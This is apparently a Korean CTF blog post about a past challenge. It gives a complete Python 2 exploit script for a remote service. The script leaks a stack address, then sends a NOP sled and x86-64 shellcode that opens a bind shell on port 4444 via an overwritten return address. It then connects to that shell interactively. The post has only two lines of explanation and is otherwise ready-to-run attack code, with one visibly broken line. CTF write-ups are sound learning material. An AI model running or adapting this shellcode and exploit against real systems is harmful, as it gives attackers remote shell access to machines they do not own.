왠지 스택이 릭되지 않는 문제가 가끔 있긴 한데 어쨌든 작동은 한다.

memcpy로 strcpy로 덮일 dest의 주소를 덮어서 원하는 주소에 값을 덮어쓰고, 이를 이용해 RET을 버퍼 주소로 이동시켜 NOP Sled를 타고 쉘코드가 실행되게 한다.


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
from hackutil import *
from socket import *
from telnetlib import *
 
HOST = "192.168.136.152"
PORT = 6666
 
#================================================================
shellcode = ("\x31\xc0\x31\xdb\x31\xd2\xb0\x01\x89\xc6\xfe\xc0\x89\xc7\xb2"
        "\x06\xb0\x29\x0f\x05\x93\x48\x31\xc0\x50\x68\x02\x01\x11\x5c"
        "\x88\x44\x24\x01\x48\x89\xe6\xb2\x10\x89\xdf\xb0\x31\x0f\x05"
        "\xb0\x05\x89\xc6\x89\xdf\xb0\x32\x0f\x05\x31\xd2\x31\xf6\x89"
        "\xdf\xb0\x2b\x0f\x05\x89\xc7\x48\x31\xc0\x89\xc6\xb0\x21\x0f"
        "\x05\xfe\xc0\x89\xc6\xb0\x21\x0f\x05\xfe\xc0\x89\xc6\xb0\x21"
        "\x0f\x05\x48\x31\xd2\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68"
        "\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xc0\x50\x57\x48\x89"
        "\xe6\xb0\x3b\x0f\x05\x50\x5f\xb0\x3c\x0f\x05")
#================================================================
 
banner()
 
print "==================[ Phase 1 : Stack leak ]=================="
sock = socket(AF_INET, SOCK_STREAM)
sock.connect((HOST, PORT))
 
payload = "\x00"*0x108
time.sleep(0.1)
sock.send('arsenal\n')
time.sleep(0.1)
sock.recv(1024)
sock.send('gyeongbokgung\n')
time.sleep(0.1)
sock.recv(1024)
sock.send('psy\n')
time.sleep(0.1)
sock.recv(1024)
sock.send(payload)
time.sleep(0.1)
 
data = up64(sock.recv(2048)[0x108:0x110])[0]
print "[*] Find Stack : "+hex(data)
 
sock.close()
print "=============[ Phase 2 : Attack with Shellcode ]============"
 
sock2 = socket(AF_INET, SOCK_STREAM)
sock2.connect((HOST, PORT))
payload = "\x90"*20 + shellcode + "\x90"*(0x108-20-len(shellcode)) + p64(data+16)
print "Payload Length : "+hex(len(payload))
time.sleep(0.1)
sock2.send('arsenal\n')
time.sleep(0.1)
sock2.recv(1024)
sock2.send('gyeongbokgung\n')
time.sleep(0.1)
sock2.recv(1024)
sock2.send('psy\n')
time.sleep(0.1)
sock2.recv(1024)
sock2.send(payload)
time.sleep(2)
 
print "=================[ Phase 3 : Got the Shell ]================"
 
sock3 = socket(AF_INET, SOCK_STREAM)
sock3.connect((HOST, 4444))
= Telnet()
t.sock = sock3
t.interact()
cs


'CTF > 지난 대회' 카테고리의 다른 글

Codegate 2015 - Bookstore  (0) 2015.11.16
Layer7 CTF 2015 - Spil..Spli....SPPPPPIILL  (0) 2015.11.03
PlaidCTF 2013 - pork  (0) 2015.10.29
Codegate 2014 - AngryDoraemon  (0) 2015.10.25
Plaid CTF 2013 - ropasaurusrex  (0) 2015.10.22
블로그 이미지

__미니__

E-mail : skyclad0x7b7@gmail.com 나와 계약해서 슈퍼 하-카가 되어 주지 않을래?

,